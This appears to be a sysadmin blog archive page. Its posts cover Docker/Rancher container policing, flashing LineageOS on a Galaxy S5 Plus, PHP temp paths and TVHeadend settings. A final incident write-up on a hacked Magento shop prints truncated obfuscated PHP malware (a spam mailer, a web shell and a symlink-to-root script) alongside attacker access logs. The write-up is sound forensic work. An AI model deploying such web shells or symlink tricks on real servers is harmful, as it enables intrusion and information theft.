Docker automatically loads container profiles. The Docker binary installs a docker-default profile in the /etc/apparmor.d/docker file. This profile is used on containers, not on the Docker Daemon.

I also turrned to Rancher and created a feature request issue on their Github repo as well. To be honest with little hope that this will be implemented soon, because as of this writing, the Rancher repo still has over 1200 issues open to be addressed and solved.

So neither Docker, nor Rancher, nor AppArmor are at this moment capable of preventing dangerous (and unnecessary) container settings.

How to proceed from here? I didn't want to "block" the technology, yet "volume" and "privileged" are the clear no-gos for a production environment (once again, OK in development environments). I started digging around in the Rancher API and this is actually a very nice and easy to learn API. It turns out, a container can be stopped and deleted/purged through the API using an authorization key and password. I decided to combine this with our Icinga2 monitoring in place. The goal: On each Docker host, a monitoring plugin is called every other minute. This plugin goes through the list of every container using the ID of the "docker ps" output.

root@dockerhost:~# docker ps | grep claudio
CONTAINER ID  IMAGE           COMMAND       CREATED        STATUS         PORTS     NAMES
5a87a58982f9  ubuntu:14.04.3  "/bin/bash"   5 seconds ago  Up 4 seconds             r-claudiotest

This ID represents the "externalId" which can be looked up in the Rancher API. Using this information, the Rancher API can be queried to find out about the data volumes of this container in the given environment (1a12) using the "externalId_prefix" filter :

curl -s -u "ACCESSUSER:ACCESSKEY" -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{}' 'https://rancher.example.com/v1/projects/1a12/containers?externalId_prefix=5a87a58982f9' | jshon -e data -a -e dataVolumes
[
 "\/:\/tmp"
]

As soon as something shows up in the array, this is considered bad and further action takes place. The Docker "id" within the Rancher environment can be figured out, too:

curl -s -u "ACCESSUSER:ACCESSKEY" -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{}' 'https://rancher.example.com/v1/projects/1a12/containers?externalId_prefix=5a87a58982f9' | jshon -e data -a -e id
"1i22342"

Using this "id", the bad container can then be stopped and deleted/purged:

curl -s -u "ACCESSUSER:ACCESSKEY" -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' -d '{"remove":true, "timeout":0}' 'https://rancher.example.com/v1/projects/1a12/instances/1i22342/?action=stop'

Still, this does not prevent the creation and mounting of volumes or the hosts filesystem, nor does it prevent privileged containers upon creation of a container. But it will ensure that such containers, created on purpose, by error or through a hack, are immediately destroyed. Hopefully before they can do any harm. I sincerely hope that Docker will look more into security and Docker settings though. Without such workarounds and efforts - and a cloud-ready application - it's not advisable to run Docker containers in production. And most importantly: You need the technical understanding of your developer colleagues where and when Docker containers make sense.

For now the path to Docker continues with the mentioned workaround and there will be a great learning curve, probably with some inevitable problems at times - but at the end (hopefully) a stable, dynamic and scalable production environment running Docker containers.

How did YOU tackle these security issues? What kind of workarounds or top layer orchestration are you using to prevent the dangerous settings? Please leave a comment, that would be much appreciated!

 

Install LineAge 14 (Android 7 Nougat) on Samsung Galaxy S5 Plus G901F
Monday - Dec 12th 2016 - by - (6 comments)

It has been a while since I wrote an Android article. Because it has been a while since I saw there was an update for the Samsung Galaxy S5 Plus (model number G901F). Back in July 2015 I wrote two articles for this device:

Since July 2015 I kept using CM12.0 (Android 5.0) on the G901F. The CM 12.1 turned out to be a battery burner and 12.0, although without any updates anymore, still was much better than the original stock Android (Touchwiz) from Samsung.

Out of curiousity I checked, if there was a recent version and, to my big surprise, someone really cared about that device and created new CM versions (see this XDA forums thread).

So this article describes how you can install CyanogenMod 14 (Android 7) on your Samsung Galaxy S5 Plus (G901F). But first some preparations need to be done. As it turns out, the newer Android versions require a newer bootloader and modem driver. I had to fall on my nose myself to figure that out. Please read and follow the following steps carefully.

1. You understand that you most likely void your warranty of your Samsung device. As with all other tutorials, you are responsible for your own actions etc bla bla. If you brick/destroy your device it's your own fault.

2. Download the newest version of Odin from http://odindownload.com/download. Odin is a tool to install/flash firmware to Samsung devices. As of this writing I downloaded and installed Odin 3.12.3.

3. Download newer bootloader and modem driver for this phone with version CPE1. Original links were given to me in the XDA forums by user ruchern:

Some notes on the Bootloader (BL) and Modem (CP) versions: Besides CPE1 I also tried versions BOH4 (always rebooted the phone during the Wifi screen in Android setup) and CPHA (which never completely booted Android).

4. Download a new Recovery ROM. I chose TWRP which can be downloaded here: http://teamw.in/devices/samsunggalaxys5plus.html . Download the "tar" package. During this writing the current version was twrp-3.0.2-0-kccat6.img.tar. Note: In my older article I used CWM recovery. TWRP offers to mount the phone as USB drive when in Recovery, which is very helpful for the installation of zip files.

5. Download and install the Samsung USB drivers (SAMSUNG_USB_Driver_for_Mobile_Phones.zip) if you haven't already. You can download this from http://developer.samsung.com/technical-doc/view.do?v=T000000117.

6. Power off the Galaxy S5.

7. Boot your phone into the Download Mode by pressing the following buttons altogether: [Volume Down] + [Home] + [Power] until you see a warning triangle. Accept the warning by pressing the [Volume Up] button.

G901F Downloader Boot 

8. Start the Odin executable. You might have to unzip/unpack the downloaded Odin version first. 

9. Connect the phone to the computer with the phone's USB cable. In Odin one of the ID:COM fields should now show a connection. In the "Log" field you should see an entry like "Added!!".

10. Let's start by installing TWRP recovery. In Odin click on the "AP" button and select the tar file from twrp (twrp-3.0.2-0-kccat6.img.tar).

G901F Odin install TWRP

Then click on Start. The phone will reboot (unless you have unticked auto-reboot in the Odin options). Let the phone finish boot your existing OS and then power off the phone again. Exit Odin and disconnect the USB cable.

11. This is for verification: Boot the phone into Recovery mode by pressing the following buttons altogether: [Volume Up] + [Home] + [Power] until you see a blue text at the top. You should now see the TWRP Recovery. If this was working for you - great, we can proceed. If not, you can try it again or try to install another Recovery (check out Samsung Galaxy S5 (G901F): Pain to install custom recovery or Cyanogenmod again). Power off the Galaxy S5.

G901F TWRP Recovery 

12. Boot your phone into the Download Mode again by pressing the following buttons altogether: [Volume Down] + [Home] + [Power] until you see a warning triangle. Accept the warning by pressing the [Volume Up] button.

13. Start Odin again and connect your phone with the USB cable. This time we're going to flash the new Bootloader (BL) and Modem (CP) versions. Click on the "BL" button and select the bootloader file (G901FXXU1CPE1_bootloader.tar.md5). Click on the "CP" button and select the modem file (G901FXXU1CPE1_modem.tar.md5).

G901F Bootloader Odin 

G901F Odin Modem Flash 

Then click on the "Start" button. The phone will reboot again, once done.

14. Now I'm not sure whether your old Android installation will still boot with the new bootloader or not. If it doesn't even after several minutes and it is stuck showing the same screen, just power off the phone (in the worst case by pulling the battery). If it does still boot your old Android OS, do a normal power off of the phone. Disconnect the USB cable. Exit Odin if you haven't already.

15. Boot the phone into Recovery mode by pressing the following buttons altogether: [Volume Up] + [Home] + [Power] until you see a blue text at the top. Connect the USB cable. In TWRP tap on "Mount". In the next window tap on "Mount USB Storage". Your phone should now be appearing as USB storage on your computer and you can simply transfer files to the phone.

G901F TWRP Menu G901F TWRP Mount G901F TWRP Mount

16. On your computer download CM14 from http://ionkiwi.nl/archive/view/4/samsung-galaxy-s5--g901f--kccat6xx. In my case, I downloaded the currently latest CM14.0 (cm-14.0-20161208-UNOFFICIAL-kccat6xx.zip). Once download is complete, transfer the file to your phone using the mounted USB storage.

17. On your computer download the Google Apps (GApps) using http://opengapps.org/. Select Platform: ARM, Android: 7.0, Variant: mini (Note: The default "stock" didn't work for me, it has caused a crash of "Google Play Services" in the Android setup after initial boot of the phone). This should give you a file like this: open_gapps-arm-7.0-mini-20161211.zip. Once download is complete, transfer the file to your phone using the mounted USB storage.

G901F Placing zips on internal SD card 

18. On your phone in TWRP go back to the main screen and tap on "Wipe". Swipe the blue bar to the right for a Factory Reset.

G901F TWRP Wipe G901F Wipe 

19. In TWRP go back to the main screen and tap on "Install". Cool in TWRP: You can select several zip files to install one after another. So first select the cm-14 zip file, then tap on "Add more Zips" and then select the open_gapps zip file. After you selected the open_gapps zip file, tick the "Reboot after installation is complete" checkbox. Then swipe the blue bar to the right to install the zip files ("Swipe to confirm Flash").

G901F Install CM14 zip G901F Install CM14 zip G901F Install CM14 zip

20. After the installation the phone reboots and the CyanogenMod robo logo should appear. Give the phone some time to boot, it took my phone around 3 mins for the first boot. Then the Android setup starts up. This I really don't need to explain.

G901F CM14 boot G901F CM14 Android Setup G901F Android 7 Nougat

21. After the Android setup you can check out your phone's version in Settings -> About.

G901F Android Nougat CM14 G901F Android 7 Cyanogenmod 14

Enjoy your phone not being dead :D

PS: I created a stale mirror of the mentioned files in case the original links don't work in the future: https://www.claudiokuenzler.com/downloads/G901F-CM14/  

Update January 3rd 2017: As you may have heard, the CyanogenMod project is dead. A fork of CM, called Lineage, is available though. This howto of course also works for the newer Lineage zip files. I changed the title of this howto accordingly.

 

PHP: sys_temp_dir is not the same as upload_tmp_dir, it stays /tmp
Friday - Dec 9th 2016 - by - (0 comments)

Today I realized, that handling temporary paths in PHP is not always very clear. I thought setting upload_tmp_dir and session.save_path in a virtual host would be enough to keep temporary files of vhosts separated and keep applications working.

Well at least in the past ~15 years of on and off work with PHP and with thousands of virtual hostings I never had any problems with the temporary paths in combination with open_basedir. Until today when someone wasn't able to write into the temp path because of an open_basedir restriction.

It turns out that the PHP script, wanting to create a temporary file, was using the function sys_get_temp_dir(). And this function always returned /tmp. I tested this with the following code:

$temp_file = sys_get_temp_dir();
echo $temp_file;

The result always resulted in /tmp. Even when all the following settings were set for this virtual host:

upload_tmp_dir = /var/www/user/phptmp/
session.save_path = /var/www/user/phptmp/

As this didn't help, I even tried setting an Apache environment variable:

SetEnv TMPDIR /var/www/user/phptmp/

Although the env vars could be read by PHP (verified in phpinfo), none of that helped. The function sys_get_temp_dir() still read /tmp.
Unfortunately as this web server is still using PHP 5.3, this is not configurable. Only in PHP 5.5 a new option sys_temp_dir was added, as can be seen on http://php.net/manual/en/ini.list.php:

Name          Default   Changeable         Changelog
sys_temp_dir     ""     PHP_INI_SYSTEM     Available since PHP 5.5.0.

There are two workarounds to help in this scenario:

1) The PHP script/application shouldn't use sys_get_temp_dir() to define its own temporary path. It should rather read the value from upload_tmp_dir. If you programmed the script yourself, that shouldn't be much effort.

2) Adapt the open_basedir path to include /tmp.

As the affected web server still runs with PHP 5.3 and the script is part of a web application, I went for workaround 2 and added /tmp to the open_basedir value.

 

TVHeadend Mutex Scan Settings for Cablecom and Thurcom (Switzerland)
Tuesday - Dec 6th 2016 - by - (0 comments)

If you're living in Switzerland and you want to configure your TVHeadend settings to scan the Swiss TV proviers Cablecom or Thurcom (region of Wil SG), then you're right here.

It took me some time to finally find the correct mutex settings, but here they are.

Network:

TVHeadend Network Settings Thurcom

Note: According to the Thurcom website, the network ID should be set to 360 if no smartcard is attached.

(First) Mutex:

TVHeadend Mutex Mux Thurcom Cablecom

Note: The above mentioned hint tells you to use the frequency 314kHz. In my case this didn't work. I was much more successful with 826kHz and I left the symbol rate at 0.

Then I forced the scan on the network and it got me all the scan results and channels:

TVHeadend Thurcom Mutex Scan

TVHeadend Thurcom Channels Services

Attention if you come across errors like these (scan no data, failed):

2016-12-03 19:01:35.001 mpegts: 314MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:01:35.001 opentv-ausat: registering mux 314MHz in DVB-C Network
2016-12-03 19:01:35.019 subscription: 000B: "scan" subscribing to mux "314MHz", weight: 5, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:01:40.148 mpegts: 314MHz in DVB-C Network - scan no data, failed
2016-12-03 19:01:40.148 subscription: 000B: "scan" unsubscribing
2016-12-03 19:01:40.154 mpegts: 250MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:01:40.154 opentv-ausat: registering mux 250MHz in DVB-C Network
2016-12-03 19:01:40.183 subscription: 000D: "scan" subscribing to mux "250MHz", weight: 5, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:01:41.243 linuxdvb: CXD2837 DVB-C DVB-T/T2 : DVB-C #0 - poll TIMEOUT
2016-12-03 19:01:45.000 mpegts: 250MHz in DVB-C Network - scan no data, failed
2016-12-03 19:01:45.000 subscription: 000D: "scan" unsubscribing
2016-12-03 19:02:12.680 mpegts: 250MHz in DVB-C Network - tuning on CXD2837 DVB-C DVB-T/T2 : DVB-C #0
2016-12-03 19:02:12.680 subscription: 000E: "scan" subscribing to mux "250MHz", weight: 6, adapter: "CXD2837 DVB-C DVB-T/T2 : DVB-C #0", network: "DVB-C Network", service: "Raw PID Subscription"
2016-12-03 19:02:17.000 mpegts: 250MHz in DVB-C Network - scan no data, failed

This is probably due to a defect antenna cable. I hit the problem myself with a several meters long antenna cable still rolled up. Once I switched to a shorter and stretched cable, the errors disappeared.

 

Magento shop 1.9.2.4 hacked, possibly through Connect Manager
Monday - Dec 5th 2016 - by - (0 comments)

Today I got alerts about a spamming web server and I quickly identified the document root to be a Magento web shop installation.

mail() on [/srv/websites/shop.example.com/magento/ljamailer.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:220]: To: email.result@yahoo.com -- Headers: From : Miler Info <malingnya@darisinibosku.com>

So the bad file here is of course ljamailer.php. The question is: How did it come on the server? An overview of the document root gives several conclusions already:

webserver:/srv/websites/shop.example.com/magento # ls -ltr
total 868
-rw-r--r--  1 root   root   2112 Nov 13  2015 test.php
drwxrwxrwx  3 inmed  web    4096 Sep 28 10:58 pkginfo
drwxrwxrwx  5 inmed  web    4096 Sep 28 10:58 skin
-rw-rw-rw-  1 wwwrun www    2240 Sep 28 10:58 mage
-rw-rw-rw-  1 wwwrun www    6451 Sep 28 10:58 .htaccess
drwxrwxrwx  2 wwwrun www    4096 Sep 28 10:59 includes
drwxrwxrwx  2 wwwrun www    4096 Sep 28 10:59 shell
-rw-rw-rw-  1 wwwrun www     886 Sep 28 10:59 php.ini.sample
drwxrwxrwx 14 inmed  web    4096 Sep 28 10:59 media
-rw-rw-rw-  1 wwwrun www    6460 Sep 28 10:59 install.php
-rw-rw-rw-  1 wwwrun www    2323 Sep 28 10:59 index.php.sample
-rw-rw-rw-  1 wwwrun www    5970 Sep 28 10:59 get.php
-rw-rw-rw-  1 wwwrun www    1150 Sep 28 10:59 favicon.ico
drwxrwxrwx  3 wwwrun www    4096 Sep 28 10:59 errors
-rw-rw-rw-  1 wwwrun www    1639 Sep 28 10:59 cron.sh
-rw-rw-rw-  1 wwwrun www    2915 Sep 28 10:59 cron.php
-rw-rw-rw-  1 wwwrun www    3141 Sep 28 10:59 api.php
-rw-rw-rw-  1 wwwrun www  590092 Sep 28 10:59 RELEASE_NOTES.txt
-rw-rw-rw-  1 wwwrun www   10421 Sep 28 10:59 LICENSE_AFL.txt
-rw-rw-rw-  1 wwwrun www   10410 Sep 28 10:59 LICENSE.txt
-rw-rw-rw-  1 wwwrun www   10679 Sep 28 10:59 LICENSE.html
-rw-rw-rw-  1 wwwrun www    5351 Sep 28 10:59 .htaccess.sample
drwxrwxrwx 16 inmed  web    4096 Sep 28 10:59 lib
drwxrwxrwx 10 inmed  web    4096 Sep 28 11:01 downloader
drwxrwxrwx 10 inmed  web    4096 Dec  4 22:53 var
drwxrwxrwx 16 inmed  web    4096 Dec  4 22:53 js
-rw-rw-rw-  1 wwwrun www   25862 Dec  4 23:05 configurations.php
drwxr-xr-x  2 wwwrun www    4096 Dec  4 23:22 tmp
-rw-r--r--  1 wwwrun www   13639 Dec  4 23:27 Sym.php
drwxr-xr-x  2 wwwrun www    4096 Dec  4 23:28 sym
-rw-r--r--  1 wwwrun www   25862 Dec  4 23:40 bootstrap.php
drwxrwxrwx  6 inmed  web    4096 Dec  4 23:40 app
-rw-r--r--  1 wwwrun www   49449 Dec  5 03:43 ljamailer.php
-rw-r--r--  1 wwwrun www    2391 Dec  5 03:43 index.php

1) Several recent modifications happened on December 4th and 5th.
2) The current permissions are catastrophic. wwwrun (the Apache user) is able to modify everything. I'm not a Magento specialist, but I doubt that the shop needs to have write permissions on every file and folder.

Taking a look at ljamailer.php and no big surprise. An obfuscated PHP code appeared:

# more ljamailer.php
<?php /*obfuscated 3.0 by Lancarjaya*/ $oiIhAiaoaoASA="38c37bd5alz15n21to7is3ade2a49g9f1:69";$s0oooo0000h41="claudea-^*)nopqghyz_+(ijkmralbscstuvwdef*&x-Lanca
rjaya";$oiIohAhAaASSA = $oiIhAiaoaoASA{5}.$oiIhAiaoaoASA{8}.$oiIhAiaoaoASA{20}.$oiIhAiaoaoASA{24}.$oiIhAiaoaoASA{34}.$oiIhAiaoaoASA{27}.$s0oooo0000h41{19}.$s0
oooo0000h41{4}.$s0oooo0000h41{5}.$s0oooo0000h41{31}.$s0oooo0000h41{12}.$s0oooo0000h41{37}.$s0oooo0000h41{38};$oiIoASAhAiaoahoSAShh=file(__FILE__);$s0oo0000ooh
41=$s0oooo0000h41{30}.$s0oooo0000h41{33};$s0oo0000

I didn't bother to decode that as at the end it probably turns out to be a mailing/spamming form. More interestingly is the timestamp, when the file was uploaded:

120.188.94.254 - - [05/Dec/2016:03:43:05 +0100] "POST /configurations.php HTTP/1.1" 200 5439 "http://shop.example.com/configurations.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:43:12 +0100] "GET /ljamailer.php HTTP/1.1" 200 2524 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:43:37 +0100] "POST /ljamailer.php HTTP/1.1" 200 3921 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:44:04 +0100] "POST /ljamailer.php HTTP/1.1" 200 3995 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:44:18 +0100] "POST /ljamailer.php HTTP/1.1" 200 6272 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [05/Dec/2016:03:50:47 +0100] "POST /ljamailer.php HTTP/1.1" 200 4122 "http://shop.example.com/ljamailer.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

That's right. A POST on configurations.php, which, itself, was uploaded on December 4th. Let's take a look at configurations.php:

# more configurations.php
<?php
$idc = "=Ew/P7//fvf/e20P17/LpI7L34PwCabTrwvXJbPWN3TV+/T/mE3R5//n3zfJlHOEt/33HXCPomvNr8X9Of74N/C8u0KblTAt8+AAh3gjnKzeZWDyELiXuc/7SOiIls0QNVmiN1MH5kCOokgIho0VyV
lIZHndcCwaMgR5nwCh/GxaYNISzsK91a53vpwsnQTRCFXxDaksGVhhIOe2jUvc5hdLsdwYpT5Zv6jPE5ROlFxfzMqQfVLiAxq6/bkdRSp5I2a2ZjNfdr5moDVYbFCA6wOJdun6y30g4lv+4OL+wUVJrAZWuv6o
Xc7lHJ+jJTCGqBFKG3C1zkwLoPLQhYTQ/d5Y3K4zlhpznx7LFjlMHLLdTBunJneZugalBjR/Gpv5G/5Is6+afGoQCSDc6thAuYyC6jIsCuWATFRG6/zdlbPTJfVyM1a3wZBXHbITk2dnXV1+DDqpD3ybWE4f90
cYEglGMxuKik8QJoSP/mg16EWDi6K7EzQ/N6

No big surprise there either. Interestingly this file was uploaded twice. Once with filename configurations.php, once as bootstrap.php. Both files are identical in size and content.

# more bootstrap.php
<?php
$idc = "=Ew/P7//fvf/e20P17/LpI7L34PwCabTrwvXJbPWN3TV+/T/mE3R5//n3zfJlHOEt/33HXCPomvNr8X9Of74N/C8u0KblTAt8+AAh3gjnKzeZWDyELiXuc/7SOiIls0QNVmiN1MH5kCOokgIho0VyV
lIZHndcCwaMgR5nwCh/GxaYNISzsK91a53vpwsnQTRCFXxDaksGVhhIOe2jUvc5hdLsdwYpT5Zv6jPE5ROlFxfzMqQfVLiAxq6/bkdRSp5I2a2ZjNfdr5moDVYbFCA6wOJdun6y30g4lv+4OL+wUVJrAZWuv6o
Xc7lHJ+jJTCGqBFKG3C1zkwLoPLQhYTQ/d5Y3K4zlhpznx7LFjlMHLLdTBunJneZugalBjR/Gpv5G/5Is6+afGoQCSDc6thAuYyC6jIsCuWATFRG6/zdlbPTJfVyM1a3wZBXHbITk2dnXV1+DDqpD3ybWE4f90
cYEglGMxuKik8QJoSP/mg16EW

When configurations.php or bootstrap.php was launched in a browser, a WebShell appeared:

Web Shell

Another interesting discovery was the file Sym.php:

webserver:/srv/websites/shop.example.com/magento # cat Sym.php
<?php /* Cod3d by Mr.Alsa3ek and Al-Swisre  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2f24;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTz...

In the browser something the script looked like this:

Symlink hack 

In the access logs I saw the following requests:

120.188.94.254 - - [04/Dec/2016:23:27:50 +0100] "GET /Sym.php HTTP/1.1" 200 1019 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:27:59 +0100] "GET /Sym.php? HTTP/1.1" 200 1019 "http://shop.example.com/Sym.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:00 +0100] "GET /Sym.php?sws=sym HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:30 +0100] "GET /Sym.php?sws=sym HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?sws=sym" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:31 +0100] "GET /Sym.php?sws=sec HTTP/1.1" 200 820 "http://shop.example.com/Sym.php?sws=sym" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:33 +0100] "GET /Sym.php?sws=file HTTP/1.1" 200 994 "http://shop.example.com/Sym.php?sws=sec" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:28:37 +0100] "POST /Sym.php?sws=file HTTP/1.1" 200 1023 "http://shop.example.com/Sym.php?sws=file" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

It took me a bit to figure out the real function of this script (besides another upload function): It creates a symlink to a certain target. I found the following subfolder and its content:

webserver:/srv/websites/shop.example.com/magento/sym # ll
total 4
-rw-r--r-- 1 wwwrun www 175 Dec  5 10:03 .htaccess
lrwxrwxrwx 1 wwwrun www  32 Dec  4 23:28 file.name_sym ( Ex. :: 1.txt ) -> /home/user/public_html/file.name
lrwxrwxrwx 1 wwwrun www   1 Dec  4 23:27 root -> /

Uh oh... A symlink called root was created which points to /. Did it work? Unfortunately yes, it seems that the Apache setting "FollowSymlinks" is enabled:

Web Symlink to root directory 

And yes, this was accessed by the hacker, too:

120.188.94.254 - - [04/Dec/2016:23:41:59 +0100] "GET /sym/ HTTP/1.1" 200 408 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:42:03 +0100] "GET /sym/root/ HTTP/1.1" 200 780 "http://shop.example.com/sym/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

Information disclosure at it's finest! :-(

Uploading files through a web shell already in place is easy. Especially if the file permissions are set so mindlessly (Magento, is this really necessary?).
But how did all these php files get on the server in the first place? This is the interesting part. According to the timestamp, the older file (configurations.php) was uploaded on Dec 4 at 23:05. The log file doesn't give a helpful trace at 23:05:

120.188.94.254 - - [04/Dec/2016:23:05:03 +0100] "GET / HTTP/1.1" 200 5215 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:27 +0100] "POST / HTTP/1.1" 200 23614 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:30 +0100] "GET / HTTP/1.1" 200 5013 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:41 +0100] "POST / HTTP/1.1" 200 3046 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
120.188.94.254 - - [04/Dec/2016:23:05:52 +0100] "POST / HTTP/1.1" 200 2597 "http://shop.example.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
